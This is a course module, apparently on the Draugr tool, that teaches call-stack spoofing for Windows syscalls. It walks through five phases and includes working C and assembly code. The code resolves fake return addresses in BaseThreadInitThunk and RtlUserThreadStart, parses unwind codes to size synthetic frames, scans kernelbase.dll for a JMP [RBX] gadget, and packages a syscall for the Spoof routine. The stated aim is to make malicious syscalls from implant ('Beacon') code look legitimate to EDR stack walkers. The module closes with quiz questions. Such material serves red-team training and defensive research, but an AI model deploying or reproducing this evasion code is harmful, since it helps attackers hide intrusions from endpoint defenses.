Module 5: The Spoof Assembly Routine
Five phases orchestrate the entire stack spoof — from address resolution to cleanup and return.
Module Overview
Draugr's core logic is distributed across five distinct phases. Each phase has a single responsibility: resolve addresses, calculate frame sizes, find a code gadget, build the synthetic stack and execute, then clean up. Understanding these phases is the key to understanding how every piece of the system fits together. This module covers the orchestration layer — the next modules will dive deep into the frame construction (Module 6) and the return mechanism (Module 7).
The Five-Phase Execution Model
Every Draugr syscall passes through five phases in strict order. If any phase fails, the syscall cannot proceed safely. The macro DRAUGR_SYSCALL triggers this entire pipeline.
Five-Phase Pipeline
DraugrInit
CalcStackSize
FindGadget
Spoof() ASM
Fixup
Phase Summary
| Phase | Function | Responsibility |
|---|---|---|
| 1 | DraugrInit | Resolve three key addresses: BaseThreadInitThunk+0x14, RtlUserThreadStart+0x21, and kernelbase.dll base |
| 2 | DraugrCalculateStackSize | Parse UNWIND_CODE arrays for both functions to determine exact frame sizes in bytes |
| 3 | DraugrFindGadget | Scan kernelbase.dll .text section for a JMP [RBX] gadget (bytes 0xFF 0x23) |
| 4 | Spoof() | Assembly routine: build three-layer synthetic stack, set up registers, execute syscall |
| 5 | Fixup | Deallocate synthetic frames, restore non-volatile registers, return to original caller |
Phase 1: DraugrInit — Address Resolution
Before any stack spoofing can happen, Draugr must resolve three specific addresses. These addresses form the foundation of the entire fake call stack.
The Three Target Addresses
| Target | Why This Specific Offset |
|---|---|
kernel32!BaseThreadInitThunk + 0x14 | Points to a CALL instruction within the function. When the stack unwinder encounters this as a return address, it follows the unwind metadata for BaseThreadInitThunk and sees a legitimate call site. |
ntdll!RtlUserThreadStart + 0x21 | Points to a CALL instruction within the function. This is the bottom of every normal Windows thread's call stack — the function that the OS calls to start a thread. |
kernelbase.dll base address | Needed for Phase 3 (gadget scanning). The JMP [RBX] gadget is found by scanning the .text section of this DLL. |
Why These Offsets?
The offsets +0x14 and +0x21 are not arbitrary. They point to existing CALL instructions within each function. When an EDR's stack walker encounters these as return addresses, it performs a backward scan for a CALL instruction and finds a real one. If the return address pointed to the function entry instead, the stack walker would see no preceding CALL instruction and flag the frame as suspicious. The offsets ensure the fake return addresses appear to be genuine return sites from legitimate function calls.
C - DraugrInit (simplified)BOOL DraugrInit(PDRAUGR_CONFIG config) {
// Resolve kernel32!BaseThreadInitThunk
HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
FARPROC pBaseThreadInit = GetProcAddress(hKernel32,
"BaseThreadInitThunk");
config->BaseThreadInitThunk_Addr = (ULONG_PTR)pBaseThreadInit + 0x14;
// Resolve ntdll!RtlUserThreadStart
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
FARPROC pRtlUserThread = GetProcAddress(hNtdll,
"RtlUserThreadStart");
config->RtlUserThreadStart_Addr = (ULONG_PTR)pRtlUserThread + 0x21;
// Resolve kernelbase.dll base for gadget scanning
config->KernelBase_Addr = (ULONG_PTR)GetModuleHandleA(
"kernelbase.dll");
return TRUE;
}
Every Thread Looks the Same
On any Windows system, every user-mode thread starts with the same bottom two frames: RtlUserThreadStart calls BaseThreadInitThunk, which calls the thread's entry point. By fabricating these exact frames, Draugr's fake stack is indistinguishable from a real thread's call stack. An EDR performing stack analysis sees the standard Windows thread initialization chain.
Phase 2: Stack Size Calculation
Each synthetic frame must be exactly the right size. If the frame for BaseThreadInitThunk is even one byte off, the stack unwinder will misalign and produce garbage frames. Draugr calculates these sizes by parsing the same UNWIND_CODE metadata that Windows uses internally.
Step 1: Get RUNTIME_FUNCTION
DraugrWrapperStackSize calls RtlLookupFunctionEntry to retrieve the RUNTIME_FUNCTION structure for the target function. This structure points to the function's UNWIND_INFO, which contains the UNWIND_CODE array.
C - DraugrWrapperStackSizeDWORD DraugrWrapperStackSize(ULONG_PTR functionAddr) {
ULONG_PTR imageBase = 0;
// RtlLookupFunctionEntry retrieves the RUNTIME_FUNCTION
// for any address within an x64 function
PRUNTIME_FUNCTION pRuntimeFunc = RtlLookupFunctionEntry(
functionAddr,
&imageBase,
NULL // HistoryTable - not needed
);
if (!pRuntimeFunc) return 0;
// Parse the UNWIND_INFO to calculate total frame size
return DraugrCalculateStackSize(imageBase, pRuntimeFunc);
}
Step 2: Parse UNWIND_CODEs
DraugrCalculateStackSize iterates through the UNWIND_CODE array and accumulates the total bytes that the function's prologue allocates on the stack. Each opcode type contributes a different amount.
C - DraugrCalculateStackSize (core logic)DWORD DraugrCalculateStackSize(ULONG_PTR imageBase,
PRUNTIME_FUNCTION pFunc)
{
DWORD totalSize = 0;
// Get UNWIND_INFO from RUNTIME_FUNCTION
PUNWIND_INFO pUnwindInfo = (PUNWIND_INFO)(
imageBase + pFunc->UnwindInfoAddress
);
DWORD i = 0;
while (i < pUnwindInfo->CountOfCodes) {
UNWIND_CODE code = pUnwindInfo->UnwindCode[i];
switch (code.UnwindOp) {
case UWOP_PUSH_NONVOL: // push reg
totalSize += 8; // Each push = 8 bytes on x64
i += 1;
break;
case UWOP_ALLOC_SMALL: // sub rsp, N (small)
totalSize += (code.OpInfo * 8) + 8;
i += 1;
break;
case UWOP_ALLOC_LARGE: // sub rsp, N (large)
if (code.OpInfo == 0) {
// Next slot contains size / 8
totalSize += pUnwindInfo->UnwindCode[i+1].FrameOffset * 8;
i += 2;
} else {
// Next TWO slots contain raw 32-bit size
DWORD rawSize = *(DWORD*)&pUnwindInfo->UnwindCode[i+1];
totalSize += rawSize;
i += 3;
}
break;
default:
i += 1; // Skip unrecognized opcodes
break;
}
}
// Handle chained unwind info (UNW_FLAG_CHAININFO)
if (pUnwindInfo->Flags & UNW_FLAG_CHAININFO) {
// Chained RUNTIME_FUNCTION follows the UNWIND_CODE array
PRUNTIME_FUNCTION pChained = /* next aligned RUNTIME_FUNCTION */;
totalSize += DraugrCalculateStackSize(imageBase, pChained);
}
// Add 8 bytes for the return address pushed by CALL
totalSize += 8;
return totalSize;
}
UNWIND_CODE Opcode Reference
| Opcode | Meaning | Stack Contribution |
|---|---|---|
UWOP_PUSH_NONVOL | push reg (e.g., push rbp) | +8 bytes |
UWOP_ALLOC_SMALL | sub rsp, N where N ≤ 128 | +(OpInfo * 8) + 8 bytes |
UWOP_ALLOC_LARGE | sub rsp, N where N > 128 | Reads 1 or 2 extra UNWIND_CODE slots for the size |
UWOP_SET_FPREG | lea rbp, [rsp+N] | 0 bytes (sets frame pointer, no allocation) |
UWOP_SAVE_NONVOL | mov [rsp+N], reg | 0 bytes (saves register, no allocation) |
Chained Unwind Info
Some functions have chained unwind info (the UNW_FLAG_CHAININFO flag). This means the function's unwind data is split across multiple RUNTIME_FUNCTION entries. Draugr handles this by recursively calling DraugrCalculateStackSize on the chained entry. If it didn't, the calculated frame size would be too small, and the stack unwinder would misalign when walking past the synthetic frame.
The PRM (Parameter) Structure
The PRM structure is the central data package passed between the C orchestration code and the Spoof assembly routine. It carries everything the assembly needs to build the synthetic stack, execute the syscall, and clean up afterward.
PRM Structure Layout
Why Fixup at Offset 0x00?
The first field of PRM is the Fixup address. This is not a coincidence — it is a critical design choice. After the syscall returns, the JMP [RBX] gadget executes. RBX points to the PRM structure. The instruction JMP [RBX] dereferences RBX and jumps to the value stored at [RBX + 0] — which is the Fixup address. By placing Fixup at offset zero, the gadget naturally redirects execution to the cleanup routine without any additional offset calculations.
Register Preservation
The x64 Windows calling convention designates certain registers as non-volatile (callee-saved). Any function that modifies these registers must restore them before returning. Since the Spoof routine manipulates the entire stack and register state, it must save and restore all non-volatile registers to maintain correctness.
Non-Volatile Register Save
At the very beginning of the Spoof routine, the following registers are saved into the PRM structure:
| Register | PRM Offset | Why It Must Be Saved |
|---|---|---|
RDI | 0x10 | Callee-saved; used internally by Spoof for memory operations |
RSI | 0x18 | Callee-saved; may be used as a source pointer |
R12 | 0x20 | Callee-saved; available as scratch within Spoof |
R13 | 0x28 | Callee-saved; available as scratch within Spoof |
R14 | 0x30 | Callee-saved; available as scratch within Spoof |
R15 | 0x38 | Callee-saved; available as scratch within Spoof |
ASM - Spoof() entry (from Stub.s)Spoof:
; RCX = pointer to PRM structure
mov rbx, rcx ; RBX = &PRM (persists across syscall)
; Save the original return address
mov rax, [rsp] ; RAX = return address on stack
mov [rbx + 0x08], rax ; PRM.OG_retaddr = return address
; Save all non-volatile registers into PRM
mov [rbx + 0x10], rdi ; PRM.saved_rdi
mov [rbx + 0x18], rsi ; PRM.saved_rsi
mov [rbx + 0x20], r12 ; PRM.saved_r12
mov [rbx + 0x28], r13 ; PRM.saved_r13
mov [rbx + 0x30], r14 ; PRM.saved_r14
mov [rbx + 0x38], r15 ; PRM.saved_r15
; ... Phase 4 continues: build synthetic stack ...
Why RBX Is the Anchor
RBX is a non-volatile register in the x64 calling convention. This means the syscall instruction (which transitions to kernel mode and back) is required to preserve RBX. After the syscall returns, RBX still points to the PRM structure. This is why the JMP [RBX] gadget works — it can always find the Fixup address through the preserved RBX pointer, no matter what the kernel did during execution.
What Happens If Registers Are Not Restored?
If the Fixup routine fails to restore the non-volatile registers, the calling function will use corrupted values. The C compiler assumes that callee-saved registers are unchanged after a function call. Corrupted RDI, RSI, or R12-R15 would cause silent data corruption, wrong loop counters, invalid pointer dereferences, or outright crashes in the Beacon code that called the Draugr syscall.
Putting It All Together
Here is the complete data flow from the DRAUGR_SYSCALL macro to the Spoof assembly entry point:
Data Flow: C to Assembly
macro expands
fills PRM struct
RCX = &PRM
3-layer synthetic
kernel transition
DraugrCall: The Packager
DraugrCall is the final C function before entering assembly. It populates every field of the PRM structure with data gathered from Phases 1–3, sets the SSN, the syscall instruction address, and copies all function arguments into the PRM. Then it calls Spoof(&PRM), passing the structure pointer in RCX (the first argument register on x64 Windows).
C - DraugrCall (simplified)NTSTATUS DraugrCall(PDRAUGR_CONFIG config, PVX_TABLE_ENTRY entry,
DWORD argc, ...)
{
PRM prm = { 0 };
// Phase 1 results
prm.BaseThreadInitThunk_Addr = config->BaseThreadInitThunk_Addr;
prm.RtlUserThreadStart_Addr = config->RtlUserThreadStart_Addr;
// Phase 2 results
prm.BaseThreadInitThunk_Size = config->BaseThreadInitThunk_FrameSize;
prm.RtlUserThreadStart_Size = config->RtlUserThreadStart_FrameSize;
// Phase 3 result
prm.Gadget = config->GadgetAddr;
// SSN and syscall address from VxTable
prm.SSN = entry->wSSN;
prm.SyscallAddr = entry->pSyscallAddr;
// Fixup routine address
prm.Fixup = (ULONG_PTR)&Fixup;
// Copy function arguments into PRM
va_list args;
va_start(args, argc);
for (DWORD i = 0; i < argc; i++) {
prm.args[i] = va_arg(args, ULONG_PTR);
}
va_end(args);
// Enter the assembly routine
return Spoof(&prm);
}
Module 5 Quiz: The Spoof Assembly Routine
Q1: Why are the offsets +0x14 and +0x21 chosen for BaseThreadInitThunk and RtlUserThreadStart respectively?
Q2: Why is the Fixup address stored at offset 0x00 in the PRM structure?